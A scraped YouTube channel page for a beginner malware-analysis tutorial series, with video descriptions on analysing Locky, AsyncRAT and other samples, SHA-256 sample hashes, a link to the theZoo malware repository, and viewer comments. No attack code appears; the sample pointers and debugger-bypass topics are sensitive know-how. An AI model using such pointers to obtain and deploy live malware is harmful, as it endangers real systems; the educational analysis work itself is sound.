- 42
- 44 332
CryptoW@re
India
เข้าร่วมเมื่อ 25 ส.ค. 2015
Hello All,
Welcome to my TH-cam Channel :)
This Channel focuses on cybersecurity topics such as Malware Analysis, Reverse Engineering, OSINT, Threat Hunting, and more.
Welcome to my TH-cam Channel :)
This Channel focuses on cybersecurity topics such as Malware Analysis, Reverse Engineering, OSINT, Threat Hunting, and more.
Analysing Ransomware (Locky) - Part1
In this video, we're analyzing the Locky ransomware using x32dbg. We'll look at some subtle things this malware does before performing encryption. This is Part 1 of our analysis, and in the next part, we'll explore how the encryption mechanism works.
This approach is great for beginners who want to learn how to analyze ransomware.
Disclaimer: Please use a sandboxed environment for malware analysis.
Hash of the sample used- 0537fa38b88755f39df1cd774b907ec759dacab2388dc0109f4db9f0e9d191a0
Link to thezoo github repository - github.com/ytisf/theZoo/
Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/
Twitter: freak_crypt
Github: github.com/Shrutirupa
Instagram: shruti_jiee
#malware #learning #infosec #infosecurity #cyberattack #databreach #malwareanalysis #malwareattacks #malwaredetection #cyber #cybercrime
#staticanalysis #dynamicanalysis #debugging #ransomware #Lockyransom #locky
This approach is great for beginners who want to learn how to analyze ransomware.
Disclaimer: Please use a sandboxed environment for malware analysis.
Hash of the sample used- 0537fa38b88755f39df1cd774b907ec759dacab2388dc0109f4db9f0e9d191a0
Link to thezoo github repository - github.com/ytisf/theZoo/
Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/
Twitter: freak_crypt
Github: github.com/Shrutirupa
Instagram: shruti_jiee
#malware #learning #infosec #infosecurity #cyberattack #databreach #malwareanalysis #malwareattacks #malwaredetection #cyber #cybercrime
#staticanalysis #dynamicanalysis #debugging #ransomware #Lockyransom #locky
มุมมอง: 269
วีดีโอ
Deobfuscation Done Easy - Sample5
มุมมอง 1642 หลายเดือนก่อน
In this video, we are deobfuscating another sample, which looked slightly complicated in the beginning but it was easy to deobfuscate it by making various tools and utilities of our use. We will be gradually moving on to complicated obfuscated samples, and also not rely on static deobfuscation in the upcoming videos. The videos are beginner friendly. Keep learning and exploring :) Hash: 985dda7...
Solving RE Challenge - 2
มุมมอง 822 หลายเดือนก่อน
In this video, we are bypassing the password and also finding present in this challenge to successfully get to the "successful" option. Here, we observe how the entered string is compared against the hardcoded string. Disclaimer: Please use a sandboxed environment for this. Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt Github: github.com/Shrutirupa Instagr...
Static Analysis of HTA File (As Requested By the Viewer)
มุมมอง 1553 หลายเดือนก่อน
In this video, we're analyzing an HTA file that we observed being downloaded from the XLS sample we analyzed in one of our previous videos. This sample appears to be a loader with some embedded files. We've conducted a basic analysis of the sample, and we will analyze the embedded files in our upcoming videos as well. Link to the video of XLS Sample Analysis- th-cam.com/video/pM78cMl2yo8/w-d-xo...
Bypassing IsDebuggerPresent using x32dbg
มุมมอง 6023 หลายเดือนก่อน
In this video, we are learning how to bypass the IsDebuggerPresent API call while analyzing malware. This is not the only technique used, but it is one of the common techniques employed by malware. Disclaimer: Please use a sandboxed environment for analysing malware. Hash of the sample used- e1dc04d5611806a578a793ef0d188c49858c004a291529e1818585e57993396c Linkedin: www.linkedin.com/in/shrutirup...
Basic RE Challenge - Bypassing Passwords
มุมมอง 1743 หลายเดือนก่อน
In this video, we are bypassing the password present in this challenge to successfully get to the "success" option. Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt Github: github.com/Shrutirupa Instagram: shruti_jiee #malware #learning #infosec #infosecurity #cyberattack #databreach #malwareanalysis #malwareattacks #malwaredetection #cyber #cybercrime #stati...
Static Analysis of an XLS file - using oletools (As requested by a Viewer)
มุมมอง 2194 หลายเดือนก่อน
In this video, we're analysing an XLS sample statically using Oletools. This sample seems to be a downloader which wants to execute some other files. Although, we could not get access to the next file, however, this much amount of analysis, as beginner, should be good enough to get started. Disclaimer: Please use a sandboxed environment for analysing malware. Linkedin: www.linkedin.com/in/shrut...
Analysing Real Malware Sample(Debugging) - AsyncRAT (Part2)
มุมมอง 3374 หลายเดือนก่อน
In this video, we're debugging the sample, which we had analysed statically in the previous video.. I'll be walking you through the exact steps I use in my daily workflow to perform debugging and identifying anything interesting during the analysis. This approach could be especially helpful for beginners looking to get a clear understanding of how to handle such threats. Disclaimer: Please use ...
Analysing Real World Sample - ASyncRAT
มุมมอง 5605 หลายเดือนก่อน
In this video, we're diving into the analysis of ASyncRAT, a notorious Remote Access Trojan (RAT). I'll be walking you through the exact steps I use in my daily workflow to dissect and understand malware samples. This approach could be especially helpful for beginners looking to get a clear understanding of how to handle such threats. Disclaimer: Please use a sandboxed environment for analysing...
Analysing Malicious Packets(CnC) using Wireshark
มุมมอง 2225 หลายเดือนก่อน
In this video, we are analysing CnC packets using wireshark. As it is not possible to have a CnC live for analysis unless extremely recent, I have analysed an existing pcap file having packets related to the same. I am using Linux here. It can be run in windows OS as well. It is advised to perform analysis in a sandboxed environment. Don’t forget to share, like, comment, and subscribe :) You ca...
UnderstandingToolsForBeginners - Wireshark Part1
มุมมอง 2536 หลายเดือนก่อน
In this video, we are learning how to get started with wireshark. We are learning about capturing packets and gradually we will learn about identifying malicious packets in wireshark. I am using Linux here. It can be run in windows OS as well. It is advised to perform analysis in a sandboxed environment. Don’t forget to share, like, comment, and subscribe :) Linkedin: www.linkedin.com/in/shruti...
Analysis of .Net Sample: Removing Protection & Introduction to Debugging
มุมมอง 2516 หลายเดือนก่อน
In this video, we are analysing a .NET sample, which is protected. The protector that it uses is SmartAssembly. And also we will get started with basic debugging of the sample using DNSPY. This malware most probably belongs to VenomRAT Family. Disclaimer: Please use a sandboxed environment for analysing malware. Hash of the sample used- 0ad767569575baeeba2c76169fe9389b805364dd3a71e5e8d818dea5a9...
Malware Analysis - Identifying a Dropper
มุมมอง 8847 หลายเดือนก่อน
In this video, we are quickly analysing a malware which is a dropper and how we can get some basic details using a debugger. Again mostly, we have used very few tools to analyse and understand the intention of the sample. The sample used here is a recent malware, most probably belonging to RedlineStealer Malware Family. Disclaimer: Please use a sandboxed environment for analysing malware Sample...
Static Malware Analysis - .NET executable
มุมมอง 6067 หลายเดือนก่อน
In this video, we are performing Static Analysis of a dot net executable by using 3 simple tools - PEStudio, DIE(DetectItEasy) and ILSpy. We are trying to understand what the malicious sample is most probably trying to achieve. Malicious sample - 2E4D8723602C5FFC6409DCEB0CB4CED2E749E374A0FCD41FE92E0FD50F817C5B Link to basic malware videos - th-cam.com/play/PLR_k_vG4Lz0Hrr_pwKQ8STd_QfVBRSVGK.htm...
Deobfuscation Done Easy - Sample4
มุมมอง 1368 หลายเดือนก่อน
In this video, we are deobfuscating each sample and analysing the deobfuscated part. Initially, the samples chosen are simpler. With time, we will move on to complicated obfuscated samples as well. Make sure you perform analysis in a sandboxed environment. Don’t forget to share, like, comment, and subscribe :) Linkedin: www.linkedin.com/in/shrutirupa-banerjiee/ Twitter: freak_crypt ...
Unpacking Malicious File using UPX in Remnux Linux - Malware Analysis
มุมมอง 1.4K2 ปีที่แล้ว
Unpacking Malicious File using UPX in Remnux Linux - Malware Analysis
Static Analysis Of PE Files(using Remnux Linux & FlareVM) : Part 01 - MalwareAnalysis
มุมมอง 2K2 ปีที่แล้ว
Static Analysis Of PE Files(using Remnux Linux & FlareVM) : Part 01 - MalwareAnalysis
Static Analysis Of PDF File(using Remnux Linux) : Part 02 - MalwareAnalysis
มุมมอง 1.3K2 ปีที่แล้ว
Static Analysis Of PDF File(using Remnux Linux) : Part 02 - MalwareAnalysis
Understanding Tools & Approach Towards Analysing Malware Samples
มุมมอง 4782 ปีที่แล้ว
Understanding Tools & Approach Towards Analysing Malware Samples
Static Analysis Of PDF File : Part 01 - MalwareAnalysis
มุมมอง 1.3K2 ปีที่แล้ว
Static Analysis Of PDF File : Part 01 - MalwareAnalysis
Static Analysis Of DocFile : Part 3 - Malware Analysis
มุมมอง 4982 ปีที่แล้ว
Static Analysis Of DocFile : Part 3 - Malware Analysis
Static Analysis Of Document File: part 2 - Malware Analysis
มุมมอง 1K2 ปีที่แล้ว
Static Analysis Of Document File: part 2 - Malware Analysis
Simple Static Analysis Of Document File for the beginner using Remnux Linux - MalwareAnalysis
มุมมอง 4.1K2 ปีที่แล้ว
Simple Static Analysis Of Document File for the beginner using Remnux Linux - MalwareAnalysis
Malware Analysis - Practical Dynamic Analysis using tools and sample Malware - Part3
มุมมอง 9252 ปีที่แล้ว
Malware Analysis - Practical Dynamic Analysis using tools and sample Malware - Part3
Great! Since i Just jumped into this to analyze a few things for myself, I didn't really know the basic commands in python which other text tutorial omit.
thanks for sharing this analysis, waiting for part-2 ma'am
@@harshitsingh2775 Thank you so much ☺️ I will be sharing the part 2 soon. I have not been keeping well so it's getting delayed.
@@CryptoWare ma'am can you demonstrate how to unpack a packed malware and also as ransomeware uses encryption so is there any way to find out the encryption algorithm it is using and its keys?
Awesome explanation. Great work. Keep posted us with some more bypass techniques.
@@lpr7165 sure... Thank you so muchhh ❤️❤️❤️
Very informative! Need regular videos 😊
Sure, I will definitely do that. Thank you so much🙂
Nice video, really want learn reverse engineering dll and sys files (driver) files
Thank you so much... I will soon start more videos on these topics too 🙂
mam can you please make viedio about diffrent certifications releted to malware analysis free as well a s paid
Sure... I will discuss on this soon. 😊
Very well Done
Thank you very much!
you're amazing! i dont miss a video from your channel! I work as a incident response analyst, and your videos help me alot! I commented once in some your videos telling this channel is so underated and I know in the future this channel will be very big! See my comment as a motivation to continue this project Thank you! 😁
Thank you so much for your kind words. Mean a lot to me... And m happy that my videos are able to help you. Really very grateful and thankful... And yes this definitely motivates me and will comeup with more videos that could be helpful to my audience ❤️❤️❤️❤️
Cool tricks
i cant wait for you to make a video tutorial on ghidra. how to unpack a file protected by enigma
Awesome video as always, A small suggestion can we a bit more explained video from next time
Thank you so much... I would be definitely making an explained video soon. :)
Nothing returns when I search a messagbox string on string reference.
Mam I do have the .hta file that needs to be downloaded from the link for you to pefrom further analysis: 7fbc60658f31b1c1822d5dbe4a0feb66c13f45c48a0f296609c8f6b47aa28954 this is the hash of the file ... Hope you peform further analysis and upload another video..........
Thank you so much for sharing. I will definitely share the video. Please allow me some time before uploading.
Thanks for sharing this learning it's very helpful. Can you please share one video on register part of assembly? Thanks!
@@LastMinCybersecurity thank you so much for your kind words. ☺️❤️ I will definitely be covering the topic in my upcoming videos. I will be creating a separate playlist for the assembly part.
Very clear and neat. Nice video.keep post more videos
@@sushmithavetri5198 thank you so muchhhh ❤️
Lovely efforts. Post more videos . Keep urself fit and fine please.
Thank you so much for your kind words. ☺
Why not dig deeper and find what the password is? The address to the password is stored in RDX just before the call to strcmp - if you set a breakpoint there, you should be able to follow that address and find the password in memory.
Yes ofcourse, you can find the password. However, here I just wanted to keep it simple by bypassing it. There would be other videos coming where I will be digging deeper. The goal of making videos is not just to showcase everything that is possible in one video but covering different/same challenges and try different ways from bypassing passwords to finding the password to creating a Keygen 🙂
Cool
Great Explanation Mam !! A small question Mam where can i find the malware samples used in this video . Thank You
You will find these samples in virustotal or malware bazaar. There are other platforms too which you can look for
Thank you 😊
@@frozenheart8171 welcome 💗🙂
@@CryptoWarecan you please provide me a script. I had mailed you.
1) priv escalation 2) persistence using scheduled task 3) resource has a payload which establish a c2 connection
Your channel is so underrated. Please continue i love your content. ❤
Thank you so much for your kind words. Means a lot. Will be soon bringing some more content... ❤❤❤
Can you please mention the actual file names which you are using for the analysis from theZoo or where to download them, so that I can follow the tutorial and practice.
❤❤❤❤❤❤
Thanks
Hello maam kindly suggest research gaps in this
great content mam
Glad you liked it
Good analysis. Which one is the continuation of this video?
Thank you 😊. I will be uploading the extended version..
thanks for debugging intro. want to know from scratch. take care ur health.
Thanks so much... Surely I will be covering things in more details 🙂
What are some good courses to learn reverse engineering? From the Assembly level as well?
I will be covering some resources soon in my channel. Meanwhile practical reverse engineering could be one book that u can consider
Great content, thanks! And any tool like De4Dot for Deobfuscation of C/C++ based files?
Thank you so muchh.. do you mean the executables written in c/CPP?
@@CryptoWare yess
@@viral_codes sure. Will cover that too
This video is missing how to enable internet as my internet is not working in remnux after importing remnux in virtual box
Try to use DHClient command. Most probably IP is not addressed to the device.
Good session mam
Thank you so much 🙂🙂
Thank you for creating this video. It was very helpful on how to analyze Dynamic malware analysis in a step by step process.
Thank you so much
thanks for ur content.
Thank you so much for the support 😊
Your training content is good, I want to improve myself further and I am looking for a road map. Can I contact you?
Thank you so much for the kind words. You can connect me through LinkedIn or twitter. You can also elaborate on your query here... I will be more than happy to answer 😊
Hi.
Thanks for the support.... 😊
why not Dnspy?
I use both dnspy and ilspy. Whichever I am comfortable with at the point. If I am debugging a .net sample, I use dnspy.🙂 You may choose any tool of your choice.
Very well explained Shruti, keep it up
Thank you so much dear 😇
which app u use for recording screen? please inform if u r comfortable to share.
this videoa yet to be watched from my end. hi maam, i hope please post basic videos playlist from the scratch so that common people like can make a career. means want to know how to start career , what to go through, how to overcome different difficulties...etc in our infosec career. i hope u understood. god bless you. voice is clear in the videos. keep it up. please take care ur health.
Hello... Thank you so much for your wonderful comment. I would definitely cover all the pointers that you have mentioned. Meanwhile, I have a playlist where I have covered the basics but they are related to the technical part. Link - th-cam.com/play/PLR_k_vG4Lz0Hrr_pwKQ8STd_QfVBRSVGK.html I would answer all your questions soon in one of my upcoming videos. Thank you so much :)
Indian Acent.
What is the problem with her accent? I am sure she can spell accent correctly unlike you
Make sure to review your own spelling before commenting on someone else's accent
IMO, this is one of the best things in her videos. The accent is easy to capture and understand, this kind of video, where you can focus on the screen/content rather than looking for the subtitles/caption is what one may be comfortable with. Clarity is preferred in both ways, whatever going on in the screen and what the tutor is saying.
This not useful because today too many good malwares have anti-vm techniques.
Thank you for your feedback. It may not be helpful for the audience who already have knowledge. However my videos are mostly beginner friendly. For start, m not complicating with advanced techniques but I will be gradually covering the intermediate and advanced techniques. 🙂
Anti-vm
Where to get those pdf file tools ?
These tools are inbuilt present in remnux. However, you can directly download pdf tools from their GitHub links too. These are all open source. 😊
Is this really obfuscated? I don't think so. 😕
Not entirely. That's why I have mentioned starting from the simpler ones. Currently covering the encoded ones or straightforward ones Which are easy to cover to get an idea. I will be gradually covering slightly difficult ones in the future videos... 😊
I believe for malware analyst it seems like a simple encoding and not some sort of real obfuscation but I guess here Malware Author was trying to evade EDR and EPP by not simply showing simple CMD payload which could be really easy to detect by those detection system. Neglecting the facts that nowadays EDR & EPP can detect this as well.
Ofcourse it is simple one. Hence beginner friendly. For malware analysts, the real obfuscation deals with something very different and difficult. The rest of the scenarios will be covered gradually considering all security options involved.
New subscriber from LinkedIn, would look forward to go through with all other videos as well!
Sure.. thank you so muchh.. :)
I have seen all three video, I learnt many points about malware. Thank you for your time and skills.
Thank you so muchhh ☺️
well explained
hello~ Is there a way to download the sample files in this tutorial?
You can download the samples from malware bazaar... I will share all hashes soon for you all to download
@@CryptoWare thank you 👍👍👍